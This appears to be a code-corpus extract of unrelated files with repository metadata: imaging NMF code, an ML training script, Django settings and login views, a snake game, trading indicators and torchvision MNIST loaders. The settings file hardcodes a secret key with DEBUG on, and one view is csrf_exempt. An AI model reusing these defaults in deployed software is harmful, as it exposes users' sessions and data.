unique_pix = unique_pix[np.nonzero(unique_pix)];
#unique_pix = np.asarray(np.sort(np.unique(connect_mat_1))[1:]); #search_superpixel_in_range(connect_mat_1, permute_col, V_mat);
brightness_rank_sup = order_superpixels(permute_col, unique_pix, a_ini, c_ini);
#unique_pix = np.asarray(unique_pix);
pure_pix = [];
start = time.time();
print("find pure superpixels!")
for kk in range(num_patch):
pos = np.where(patch_ref_mat==kk);
up=pos[0][0]*patch_height;
down=min(up+patch_height, dims[0]);
left=pos[1][0]*patch_width;
right=min(left+patch_width, dims[1]);
unique_pix_temp, M = search_superpixel_in_range((connect_mat_1.reshape(dims[0],int(dims[1]/num_plane),num_plane,order="F"))[up:down,left:right], permute_col, c_ini);
pure_pix_temp = fast_sep_nmf(M, M.shape[1], residual_cut[ii]);
if len(pure_pix_temp)>0:
pure_pix = np.hstack((pure_pix, unique_pix_temp[pure_pix_temp]));
pure_pix = np.unique(pure_pix);
print("time: " + str(time.time()-start));
start = time.time();
print("prepare iteration!")
if ii > 0:
a_ini, c_ini, brightness_rank = prepare_iteration(Yd_res, connect_mat_1, permute_col, pure_pix, a_ini, c_ini);
a = np.hstack((a, a_ini));
c = np.hstack((c, c_ini));
else:
a, c, b, normalize_factor, brightness_rank = prepare_iteration(Yd, connect_mat_1, permute_col, pure_pix, a_ini, c_ini, more=True);
print("time: " + str(time.time()-start));
if plot_en:
Cnt = local_correlations_fft(Yt);
pure_superpixel_corr_compare_plot(connect_mat_1, unique_pix, pure_pix, brightness_rank_sup, brightness_rank, Cnt, text);
print("start " + str(ii+1) + " pass iteration!")
if ii == pass_num - 1:
maxiter = max_iter_fin;
else:
maxiter=max_iter;
start = time.time();
if bg:
a, c, b, fb, ff, res, corr_img_all_r, num_list = update_AC_bg_l2_Y(Yd.reshape(np.prod(dims),-1,order="F"), normalize_factor, a, c, b, ff, fb, dims,
corr_th_fix, maxiter=maxiter, tol=1e-8, update_after=update_after,
merge_corr_thr=merge_corr_thr,merge_overlap_thr=merge_overlap_thr, num_plane=num_plane, plot_en=plot_en, max_allow_neuron_size=max_allow_neuron_size);
else:
a, c, b, fb, ff, res, corr_img_all_r, num_list = update_AC_l2_Y(Yd.reshape(np.prod(dims),-1,order="F"), normalize_factor, a, c, b, dims,
corr_th_fix, maxiter=maxiter, tol=1e-8, update_after=update_after,
merge_corr_thr=merge_corr_thr,merge_overlap_thr=merge_overlap_thr, num_plane=num_plane, plot_en=plot_en, max_allow_neuron_size=max_allow_neuron_size);
print("time: " + str(time.time()-start));
superpixel_rlt.append({'connect_mat_1':connect_mat_1, 'pure_pix':pure_pix, 'unique_pix':unique_pix, 'brightness_rank':brightness_rank, 'brightness_rank_sup':brightness_rank_sup});
if pass_num > 1 and ii == 0:
rlt = {'a':a, 'c':c, 'b':b, "fb":fb, "ff":ff, 'res':res, 'corr_img_all_r':corr_img_all_r, 'num_list':num_list};
a0 = a.copy();
ii = ii+1;
c_tf = [];
start = time.time();
if TF:
sigma = noise_estimator(c.T);
sigma *= fudge_factor
for ii in range(c.shape[1]):
c_tf = np.hstack((c_tf, l1_tf(c[:,ii], sigma[ii])));
c_tf = c_tf.reshape(T,int(c_tf.shape[0]/T),order="F");
print("time: " + str(time.time()-start));
if plot_en:
if pass_num > 1:
spatial_sum_plot(a0, a, dims, num_list, text);
Yd_res = reconstruct(Yd, a, c, b);
Yd_res = threshold_data(Yd_res, th=0);
Cnt = local_correlations_fft(Yd_res);
scale = np.maximum(1, int(Cnt.shape[1]/Cnt.shape[0]));
plt.figure(figsize=(8*scale,8))
ax1 = plt.subplot(1,1,1);
show_img(ax1, Cnt);
ax1.set(title="Local mean correlation for residual")
ax1.title.set_fontsize(15)
ax1.title.set_fontweight("bold")
plt.show();
fin_rlt = {'a':a, 'c':c, 'c_tf':c_tf, 'b':b, "fb":fb, "ff":ff, 'res':res, 'corr_img_all_r':corr_img_all_r, 'num_list':num_list};
if Yd_min < 0:
Yd += Yd_min_pw;
if pass_num > 1:
return {'rlt':rlt, 'fin_rlt':fin_rlt, "superpixel_rlt":superpixel_rlt}
else:
return {'fin_rlt':fin_rlt, "superpixel_rlt":superpixel_rlt}
| [
"weiz@janelia.hhmi.org"
] | weiz@janelia.hhmi.org |
43effd84e91ca0c4c88ea8cc978acb294c5414fe | aaa9a0b1d11557c8bbe5d7ebfb55267235a61594 | /model.py | 2f4fc7c716e3b1741628a6c32b5e20866e1fa46c | [] | no_license | Vamsitej/Zomato-Restaurant-Rating-Prediction-Flask---Swagger-and-Deployment-using-Heroku | f4111ae213b14de92d17f2bb03b86ee3dc3e3241 | c73249a92c3aae85b45d4bac24d30cccd38d51f2 | refs/heads/main | 2023-05-07T15:47:18.454720 | 2021-05-16T13:10:25 | 2021-05-16T13:10:25 | 367,309,352 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 854 | py |
import pandas as pd
import numpy as np
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.model_selection import train_test_split
import warnings
warnings.filterwarnings('ignore')
df=pd.read_csv('zomato_df.csv')
df.drop('Unnamed: 0',axis=1,inplace=True)
print(df.isna().sum())
x=df.drop('rate',axis=1)
y=df['rate']
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=.3,random_state=10)
#Preparing Extra Tree Regression
from sklearn.ensemble import ExtraTreesRegressor
ET_Model=ExtraTreesRegressor(n_estimators = 120)
ET_Model.fit(x_train,y_train)
y_predict=ET_Model.predict(x_test)
import pickle
# # Saving model to disk
# pickle.dump(ET_Model, open('model.pkl','wb'))
pickle_out = open("model.pkl","wb")
pickle.dump(ET_Model, pickle_out)
pickle_out.close()
# model=pickle.load(open('model.pkl','rb'))
# print(y_predict)
| [
"gadivemulavamsitej007@gmail.com"
] | gadivemulavamsitej007@gmail.com |
f18905a92d46043feb41644ae7778a517445ada8 | cdfaf1c0cee3071d3338488ff522a0fb4033599a | /mysite/settings.py | b671bbee005689179e44911bba886ebbe8ee2c2d | [] | no_license | PashaLisovchenko/mysite | bf9e84c7812da7b89755d3006750635a07746a18 | 01ec7c792607b7e31d91fa85853249680924fb44 | refs/heads/master | 2021-09-05T01:31:03.839726 | 2018-01-23T12:34:55 | 2018-01-23T12:34:55 | 107,396,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,549 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'dh2wd4o$_99b51nuz@(84(*2u(qpqdt0x02hrzr028djd)&!)k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['testlibr.com',]
AUTH_USER_MODEL = 'accounts.User'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# my application
'books',
'django_extensions',
'accounts',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(
BASE_DIR, "media")
CELERY_BROKER_URL = 'redis://'
CELERY_RESULT_BACKEND = 'redis://'
CELERY_TIMEZONE = 'UTC'
# CELERYBEAT_SCEDULE = 'mytask': {
# 'task': '',
# 'schedule': timedelta(seconds=5),
# 'args': (16, )
# } | [
"lisovchenko.pasha@gmail.com"
] | lisovchenko.pasha@gmail.com |
fb58449531e8d4d38e17ea8628b285f48a6c86ad | 321b4ed83b6874eeb512027eaa0b17b0daf3c289 | /153/153.find-minimum-in-rotated-sorted-array.250607228.Accepted.leetcode.py | 86c48a645e1a8abbc02eb311cb58e81777442548 | [] | no_license | huangyingw/submissions | 7a610613bdb03f1223cdec5f6ccc4391149ca618 | bfac1238ecef8b03e54842b852f6fec111abedfa | refs/heads/master | 2023-07-25T09:56:46.814504 | 2023-07-16T07:38:36 | 2023-07-16T07:38:36 | 143,352,065 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 378 | py | class Solution(object):
def findMin(self, nums):
if nums[0] <= nums[-1]:
return nums[0]
left, right = 0, len(nums) - 1
while left + 1 < right:
mid = (left + right) // 2
if nums[left] >= nums[mid]:
right = mid
else:
left = mid
return min(nums[left], nums[right])
| [
"huangyingw@gmail.com"
] | huangyingw@gmail.com |
3eb0e9fa1f61b75f5ea76aa43ee046b312b36491 | 107a71aa43cdb5131ff9c40f792c13467bfe1ccd | /login_and_registration_app/views.py | 1e6810d8d4970c91b57935aa042e048a865652d4 | [] | no_license | Shifty-eyed-llama/time_keeper | 84fb43b9886619e6e9ac1fb8b531a73c0a35cc05 | e27df4250728ff85ebe4531d8701c0f9c14c8c75 | refs/heads/master | 2022-11-23T03:52:31.679136 | 2020-07-31T22:01:33 | 2020-07-31T22:01:33 | 283,028,969 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,977 | py | from django.shortcuts import render, redirect, HttpResponse
from django.contrib import messages
from .models import *
import bcrypt
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse, HttpResponseRedirect
# Create your views here.
def index(request):
return render(request, 'index.html')
def registration(request):
firstName = request.POST['firstName']
lastName = request.POST['lastName']
email = request.POST['email']
password = request.POST['password']
pw_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()
print(pw_hash)
errors = User.objects.validator_register(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect('/')
else:
user = User.objects.create(firstName=firstName, lastName=lastName, email=email, password=pw_hash)
request.session['userid'] = user.id
return redirect('/dashboard')
def login(request):
email = request.POST['email']
password = request.POST['password']
user = User.objects.filter(email=request.POST['email'])
errors = User.objects.validator_login(request.POST)
if len(errors) > 0:
for key, value in errors.items():
messages.error(request, value)
return redirect('/')
elif user:
logged_user = user[0]
if bcrypt.checkpw(password.encode(), logged_user.password.encode()):
request.session['userid'] = logged_user.id
return redirect('/dashboard')
else:
messages.error(request, "Invalid password")
return redirect('/')
def endSession(request):
del request.session['userid']
return redirect('/')
@csrf_exempt
def check_email_exists(request):
email=request.POST.get("email")
user_obj=User.objects.filter(email=email)
if user_obj:
return HttpResponse(True)
else:
return HttpResponse(False) | [
"emtbirch@gmail.com"
] | emtbirch@gmail.com |
5a8ca51af55cb939c4bc1b5781854fd3bd43364d | 9d4477d7f56fa7dda9156fc5eee5ab117213c0a8 | /django_novel/urls.py | a5f29ecabe545b24260da61b1fa42803d30c4261 | [] | no_license | liuyuan119/django_novel | 8aa59ea8de8233331bfa05241999485f2dbef51d | d1555d0a17e6e84062948343f535f1bba1971114 | refs/heads/master | 2020-03-18T23:03:10.602765 | 2018-05-30T03:08:57 | 2018-05-30T03:08:57 | 135,380,442 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 965 | py | """p_django_tmall URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url('admin/', admin.site.urls),
url(r'^art/', include('art.urls')),
# url('account/', include('auth01.urls')),
# url('day4_28/', include('day4_28.urls')),
# url(r'^$', views.index),
# url('', views.get_cate)
]
| [
"1120793140@qq.com"
] | 1120793140@qq.com |
6a77109c6aa14b0e717e99865a97ceffd8cda1c1 | 09e5ce9673590f7ca27c480da605199a6d054a63 | /modules/highscore.py | 3daff9734d8b6c7a31ec3c42d9c75b6f9f816fd8 | [] | no_license | KirillMysnik/PySnake | 781d7767cbb404033b608d15427e9e7996cc71d6 | 3fe1edc20248f20029413a31d88f673411374faf | refs/heads/master | 2021-01-13T09:46:00.622694 | 2016-09-28T14:52:14 | 2016-09-28T14:52:14 | 69,473,624 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | from modules.delays import Delay
from modules.gui import TextLabel
from internal_events import InternalEvent
LABEL_COLOR = (255, 255, 255)
HIGHSCORE_LABEL_CAPTION = "score: {score}"
HIGHSCORE_LABEL_X = 64
HIGHSCORE_LABEL_Y = 64
TIME_LABEL_CAPTION = "elapsed: {seconds}s"
TIME_LABEL_X = 64
TIME_LABEL_Y = 100
app_ = None
highscore_label = None
time_label = None
highscore = 0
time_ = 0
time_delay = None
def update_time():
global time_, time_delay
time_ += 1
time_label.caption = TIME_LABEL_CAPTION.format(seconds=time_)
time_label.render()
time_delay = Delay(1, update_time)
@InternalEvent('load')
def on_load(app):
global app_, highscore_label, time_label
app_ = app
highscore_label = TextLabel(
HIGHSCORE_LABEL_X, HIGHSCORE_LABEL_Y,
HIGHSCORE_LABEL_CAPTION.format(score=0), 48, LABEL_COLOR,
caption_bold=True)
highscore_label.render()
time_label = TextLabel(
TIME_LABEL_X, TIME_LABEL_Y, TIME_LABEL_CAPTION.format(seconds=0),
32, LABEL_COLOR)
time_label.render()
app_.register_drawer('score', highscore_label.draw)
app_.register_drawer('score', time_label.draw)
@InternalEvent('fruit_eaten')
def on_game_start(fruit):
global highscore
highscore += 1
highscore_label.caption = HIGHSCORE_LABEL_CAPTION.format(score=highscore)
highscore_label.render()
@InternalEvent('game_start')
def on_game_end():
global highscore, time_, time_delay
highscore = 0
time_ = -1
highscore_label.caption = HIGHSCORE_LABEL_CAPTION.format(score=highscore)
highscore_label.render()
update_time()
@InternalEvent('game_end')
def on_game_end():
time_delay.cancel()
| [
"kirill@mysnik.com"
] | kirill@mysnik.com |
a3c84c720bb0bc8a3ec2921c600f975aaed6f1b8 | 20b4be7df5efeb8019356659c5d054f29f450aa1 | /tools/indicators/build_indicators.py | 16a8d1caeb8619580fb4836cc6c8c4cbb50269bb | [
"Apache-2.0"
] | permissive | kumars99/TradzQAI | 75c4138e30796573d67a5f08d9674c1488feb8e4 | 1551321642b6749d9cf26caf2e822051a105b1a5 | refs/heads/master | 2020-03-29T20:14:45.562143 | 2018-09-25T16:07:21 | 2018-09-25T16:07:21 | 150,302,554 | 1 | 0 | null | 2018-09-25T17:17:54 | 2018-09-25T17:17:54 | null | UTF-8 | Python | false | false | 3,553 | py | import pandas as pd
from tools.indicators.exponential_moving_average import exponential_moving_average as ema
from tools.indicators.volatility import volatility as vol
from tools.indicators.stochastic import percent_k as K
from tools.indicators.stochastic import percent_d as D
from tools.indicators.relative_strength_index import relative_strength_index as RSI
from tools.indicators.moving_average_convergence_divergence import moving_average_convergence_divergence as macd
from tools.indicators.bollinger_bands import bandwidth as bb
class Indicators():
def __init__(self, settings=None):
self.bb_period = 20
self.rsi_period = 14
self.sd_period = 0
self.sv_period = 0
self.stoch_period = 14
self.volatility_period = 20
self.macd_long = 24
self.macd_short = 12
self.ema_periods = [20, 50, 100]
self.settings = settings
self.build_func = None
self.names = []
def add_building(self, settings=None):
if settings:
self.settings = settings
if self.settings:
self.build_func = []
for key, value in self.settings.items():
if not value:
continue
elif "RSI" == key and value:
self.names.append('RSI')
if 'default' != value:
self.rsi_period = value
self.build_func.append([RSI, 'RSI', self.rsi_period])
elif "MACD" == key and value:
self.names.append('MACD')
if 'default' != value:
self.macd_long = value[1],
self.macd_short = value[0]
self.build_func.append([macd, 'MACD', [self.macd_short, self.macd_long]])
elif "Volatility" == key and value:
self.names.append('Volatility')
if 'default' != value:
self.volatility_period = value
self.build_func.append([vol, 'Volatility', self.volatility_period])
elif "EMA" == key and value:
if 'default' != value:
for values in value:
self.names.append('EMA'+str(values))
self.build_func.append([ema, 'EMA'+str(values), values])
elif "Bollinger_bands" == key and value:
self.names.append('Bollinger_bands')
if 'default' != value:
self.bb_period = value
self.build_func.append([bb, 'Bollinger_bands', self.bb_period])
elif "Stochastic" == key and value:
self.names.append('Stochastic_D')
self.names.append('Stochastic_K')
if 'default' != value:
self.stoch_period = value
self.build_func.append([D, 'Stochastic_D', self.stoch_period])
self.build_func.append([K, 'Stochastic_K', self.stoch_period])
def build_indicators(self, data):
if not self.build_func:
raise ValueError("No indicators to build.")
indicators = pd.DataFrame(columns=self.names)
for idx in self.build_func:
print (idx[1])
if "MACD" in idx[1]:
indicators[idx[1]] = idx[0](data, idx[2][0], idx[2][1])
else:
indicators[idx[1]] = idx[0](data, idx[2])
return indicators
| [
"awakeproduction@hotmail.fr"
] | awakeproduction@hotmail.fr |
7f878a0b90f3b3d063d1b8898979bfebb591db65 | 6988ebf00a55f005a9a74922183550b0ff893d6d | /my_torchvision/datasets/mnist.py | 7b727e5edc4bf2281c77221aed8d37392009042e | [
"MIT"
] | permissive | ptklx/segmentation_models.pytorch | 8eb4467cee7f56d1bd4c7d9196cdc7aa6640bf62 | 16c68a7e6bff9644b97f340d67912c4785219818 | refs/heads/master | 2022-11-06T21:21:05.684091 | 2020-06-24T01:40:41 | 2020-06-24T01:40:41 | 274,543,431 | 0 | 0 | MIT | 2020-06-24T01:12:16 | 2020-06-24T01:12:15 | null | UTF-8 | Python | false | false | 21,298 | py | from .vision import VisionDataset
import warnings
from PIL import Image
import os
import os.path
import numpy as np
import torch
import codecs
import string
from .utils import download_url, download_and_extract_archive, extract_archive, \
verify_str_arg
class MNIST(VisionDataset):
"""`MNIST <http://yann.lecun.com/exdb/mnist/>`_ Dataset.
Args:
root (string): Root directory of dataset where ``MNIST/processed/training.pt``
and ``MNIST/processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
resources = [
("http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz", "f68b3c2dcbeaaa9fbdd348bbdeb94873"),
("http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz", "d53e105ee54ea40749a09fcbcd1e9432"),
("http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz", "9fb629c4189551a2d022fa330f9573f3"),
("http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz", "ec29112dd5afa0611ce80d1b7f02629c")
]
training_file = 'training.pt'
test_file = 'test.pt'
classes = ['0 - zero', '1 - one', '2 - two', '3 - three', '4 - four',
'5 - five', '6 - six', '7 - seven', '8 - eight', '9 - nine']
@property
def train_labels(self):
warnings.warn("train_labels has been renamed targets")
return self.targets
@property
def test_labels(self):
warnings.warn("test_labels has been renamed targets")
return self.targets
@property
def train_data(self):
warnings.warn("train_data has been renamed data")
return self.data
@property
def test_data(self):
warnings.warn("test_data has been renamed data")
return self.data
def __init__(self, root, train=True, transform=None, target_transform=None,
download=False):
super(MNIST, self).__init__(root, transform=transform,
target_transform=target_transform)
self.train = train # training set or test set
if download:
self.download()
if not self._check_exists():
raise RuntimeError('Dataset not found.' +
' You can use download=True to download it')
if self.train:
data_file = self.training_file
else:
data_file = self.test_file
self.data, self.targets = torch.load(os.path.join(self.processed_folder, data_file))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img, target = self.data[index], int(self.targets[index])
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.data)
@property
def raw_folder(self):
return os.path.join(self.root, self.__class__.__name__, 'raw')
@property
def processed_folder(self):
return os.path.join(self.root, self.__class__.__name__, 'processed')
@property
def class_to_idx(self):
return {_class: i for i, _class in enumerate(self.classes)}
def _check_exists(self):
return (os.path.exists(os.path.join(self.processed_folder,
self.training_file)) and
os.path.exists(os.path.join(self.processed_folder,
self.test_file)))
def download(self):
"""Download the MNIST data if it doesn't exist in processed_folder already."""
if self._check_exists():
return
os.makedirs(self.raw_folder, exist_ok=True)
os.makedirs(self.processed_folder, exist_ok=True)
# download files
for url, md5 in self.resources:
filename = url.rpartition('/')[2]
download_and_extract_archive(url, download_root=self.raw_folder, filename=filename, md5=md5)
# process and save as torch files
print('Processing...')
training_set = (
read_image_file(os.path.join(self.raw_folder, 'train-images-idx3-ubyte')),
read_label_file(os.path.join(self.raw_folder, 'train-labels-idx1-ubyte'))
)
test_set = (
read_image_file(os.path.join(self.raw_folder, 't10k-images-idx3-ubyte')),
read_label_file(os.path.join(self.raw_folder, 't10k-labels-idx1-ubyte'))
)
with open(os.path.join(self.processed_folder, self.training_file), 'wb') as f:
torch.save(training_set, f)
with open(os.path.join(self.processed_folder, self.test_file), 'wb') as f:
torch.save(test_set, f)
print('Done!')
def extra_repr(self):
return "Split: {}".format("Train" if self.train is True else "Test")
class FashionMNIST(MNIST):
"""`Fashion-MNIST <https://github.com/zalandoresearch/fashion-mnist>`_ Dataset.
Args:
root (string): Root directory of dataset where ``Fashion-MNIST/processed/training.pt``
and ``Fashion-MNIST/processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
resources = [
("http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-images-idx3-ubyte.gz",
"8d4fb7e6c68d591d4c3dfef9ec88bf0d"),
("http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/train-labels-idx1-ubyte.gz",
"25c81989df183df01b3e8a0aad5dffbe"),
("http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-images-idx3-ubyte.gz",
"bef4ecab320f06d8554ea6380940ec79"),
("http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/t10k-labels-idx1-ubyte.gz",
"bb300cfdad3c16e7a12a480ee83cd310")
]
classes = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal',
'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
class KMNIST(MNIST):
"""`Kuzushiji-MNIST <https://github.com/rois-codh/kmnist>`_ Dataset.
Args:
root (string): Root directory of dataset where ``KMNIST/processed/training.pt``
and ``KMNIST/processed/test.pt`` exist.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
resources = [
("http://codh.rois.ac.jp/kmnist/dataset/kmnist/train-images-idx3-ubyte.gz", "bdb82020997e1d708af4cf47b453dcf7"),
("http://codh.rois.ac.jp/kmnist/dataset/kmnist/train-labels-idx1-ubyte.gz", "e144d726b3acfaa3e44228e80efcd344"),
("http://codh.rois.ac.jp/kmnist/dataset/kmnist/t10k-images-idx3-ubyte.gz", "5c965bf0a639b31b8f53240b1b52f4d7"),
("http://codh.rois.ac.jp/kmnist/dataset/kmnist/t10k-labels-idx1-ubyte.gz", "7320c461ea6c1c855c0b718fb2a4b134")
]
classes = ['o', 'ki', 'su', 'tsu', 'na', 'ha', 'ma', 'ya', 're', 'wo']
class EMNIST(MNIST):
"""`EMNIST <https://www.westernsydney.edu.au/bens/home/reproducible_research/emnist>`_ Dataset.
Args:
root (string): Root directory of dataset where ``EMNIST/processed/training.pt``
and ``EMNIST/processed/test.pt`` exist.
split (string): The dataset has 6 different splits: ``byclass``, ``bymerge``,
``balanced``, ``letters``, ``digits`` and ``mnist``. This argument specifies
which one to use.
train (bool, optional): If True, creates dataset from ``training.pt``,
otherwise from ``test.pt``.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
"""
# Updated URL from https://www.nist.gov/node/1298471/emnist-dataset since the
# _official_ download link
# https://cloudstor.aarnet.edu.au/plus/s/ZNmuFiuQTqZlu9W/download
# is (currently) unavailable
url = 'http://www.itl.nist.gov/iaui/vip/cs_links/EMNIST/gzip.zip'
md5 = "58c8d27c78d21e728a6bc7b3cc06412e"
splits = ('byclass', 'bymerge', 'balanced', 'letters', 'digits', 'mnist')
# Merged Classes assumes Same structure for both uppercase and lowercase version
_merged_classes = set(['C', 'I', 'J', 'K', 'L', 'M', 'O', 'P', 'S', 'U', 'V', 'W', 'X', 'Y', 'Z'])
_all_classes = set(list(string.digits + string.ascii_letters))
classes_split_dict = {
'byclass': list(_all_classes),
'bymerge': sorted(list(_all_classes - _merged_classes)),
'balanced': sorted(list(_all_classes - _merged_classes)),
'letters': list(string.ascii_lowercase),
'digits': list(string.digits),
'mnist': list(string.digits),
}
def __init__(self, root, split, **kwargs):
self.split = verify_str_arg(split, "split", self.splits)
self.training_file = self._training_file(split)
self.test_file = self._test_file(split)
super(EMNIST, self).__init__(root, **kwargs)
self.classes = self.classes_split_dict[self.split]
@staticmethod
def _training_file(split):
return 'training_{}.pt'.format(split)
@staticmethod
def _test_file(split):
return 'test_{}.pt'.format(split)
def download(self):
"""Download the EMNIST data if it doesn't exist in processed_folder already."""
import shutil
if self._check_exists():
return
os.makedirs(self.raw_folder, exist_ok=True)
os.makedirs(self.processed_folder, exist_ok=True)
# download files
print('Downloading and extracting zip archive')
download_and_extract_archive(self.url, download_root=self.raw_folder, filename="emnist.zip",
remove_finished=True, md5=self.md5)
gzip_folder = os.path.join(self.raw_folder, 'gzip')
for gzip_file in os.listdir(gzip_folder):
if gzip_file.endswith('.gz'):
extract_archive(os.path.join(gzip_folder, gzip_file), gzip_folder)
# process and save as torch files
for split in self.splits:
print('Processing ' + split)
training_set = (
read_image_file(os.path.join(gzip_folder, 'emnist-{}-train-images-idx3-ubyte'.format(split))),
read_label_file(os.path.join(gzip_folder, 'emnist-{}-train-labels-idx1-ubyte'.format(split)))
)
test_set = (
read_image_file(os.path.join(gzip_folder, 'emnist-{}-test-images-idx3-ubyte'.format(split))),
read_label_file(os.path.join(gzip_folder, 'emnist-{}-test-labels-idx1-ubyte'.format(split)))
)
with open(os.path.join(self.processed_folder, self._training_file(split)), 'wb') as f:
torch.save(training_set, f)
with open(os.path.join(self.processed_folder, self._test_file(split)), 'wb') as f:
torch.save(test_set, f)
shutil.rmtree(gzip_folder)
print('Done!')
class QMNIST(MNIST):
"""`QMNIST <https://github.com/facebookresearch/qmnist>`_ Dataset.
Args:
root (string): Root directory of dataset whose ``processed''
subdir contains torch binary files with the datasets.
what (string,optional): Can be 'train', 'test', 'test10k',
'test50k', or 'nist' for respectively the mnist compatible
training set, the 60k qmnist testing set, the 10k qmnist
examples that match the mnist testing set, the 50k
remaining qmnist testing examples, or all the nist
digits. The default is to select 'train' or 'test'
according to the compatibility argument 'train'.
compat (bool,optional): A boolean that says whether the target
for each example is class number (for compatibility with
the MNIST dataloader) or a torch vector containing the
full qmnist information. Default=True.
download (bool, optional): If true, downloads the dataset from
the internet and puts it in root directory. If dataset is
already downloaded, it is not downloaded again.
transform (callable, optional): A function/transform that
takes in an PIL image and returns a transformed
version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform
that takes in the target and transforms it.
